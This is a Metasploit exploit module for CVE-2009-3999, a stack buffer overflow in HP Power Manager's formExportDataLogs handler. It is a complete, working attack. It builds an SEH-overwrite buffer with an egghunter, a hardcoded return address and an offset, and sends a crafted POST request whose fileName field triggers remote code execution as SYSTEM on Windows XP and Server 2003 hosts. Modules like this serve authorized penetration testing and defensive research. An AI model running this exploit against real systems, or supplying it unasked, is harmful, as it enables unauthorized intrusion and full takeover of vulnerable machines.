modules/exploits/windows/http/hp_power_manager_filename.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => "HP Power Manager 'formExportDataLogs' Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.
By creating a malformed request specifically for the fileName parameter, a stack-based
buffer overflow occurs due to a long error message (which contains the fileName),
which may result in arbitrary remote code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' =>
[
# Original discovery (Secunia Research)
'Alin Rad Pop',
# Metasploit module (thx DcLabs members, corelanc0d3r, humble-desser, Jason Kratzer)
'Rodrigo Escobar <ipax[at]dclabs.com.br>',
# Metasploit fu
'sinn3r'
],
'References' =>
[
[ 'CVE', '2009-3999' ],
[ 'OSVDB', '61848'],
[ 'BID', '37867' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
'DisableNops' => true,
'EncoderOptions' => {'BufferRegister' => 'EDI' } # Egghunter jmp edi
},
'Targets' =>
[
[
# Tested on HP Power Manager 4.2 (Build 7 and 9)
'Windows XP SP3 / Win Server 2003 SP0',
{
'Ret' => 0x004174d5, #pop esi # pop ebx # ret 10 (DevManBE.exe)
'Offset' => 721
}
]
],
'Privileged' => false,
'DisclosureDate' => '2011-10-19',
'DefaultTarget' => 0))
end
def exploit
print_status("Generating payload...")
# Randomize the tag by not specifying one
eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
buffer = rand_text_alpha_upper(target['Offset'] - hunter.length)
buffer << make_nops(30) + hunter
buffer << "\xeb\xc2\x90\x90" #JMP SHORT 0xC2
buffer << [target.ret].pack('V*')[0,3] #SEH (strip the null byte, HP PM will pad it for us)
# Let's make the request a little bit more realistic looking
time = Time.new
print_status("Trying target #{target.name}...")
connect
request = send_request_cgi({
'method' => 'POST',
'uri' => '/goform/formExportDataLogs',
'vars_post' => {
'dataFormat' => 'comma',
'exportto' => 'file',
'fileName' => buffer,
'bMonth' => "%02d" %time.month,
'bDay' => "%02d" %time.day,
'bYear' => time.year.to_s,
'eMonth' => "%02d" %time.month,
'eDay' => "%02d" %time.day,
'eYear' => time.year.to_s,
'LogType' => 'Application',
'actionType' => '1%3B'
},
'headers' =>
{
'Accept' => egg,
'Referer' => "http://#{rhost}/Contents/exportLogs.asp?logType=Application"
}
}, 5)
print_status("Payload sent! Go grab a coffee, the CPU is gonna work hard for you! :)")
# Wait for a bit longer. For some reason it may take some time for the process to start
# handling our request.
select(nil, nil, nil, 7)
handler
disconnect
end
end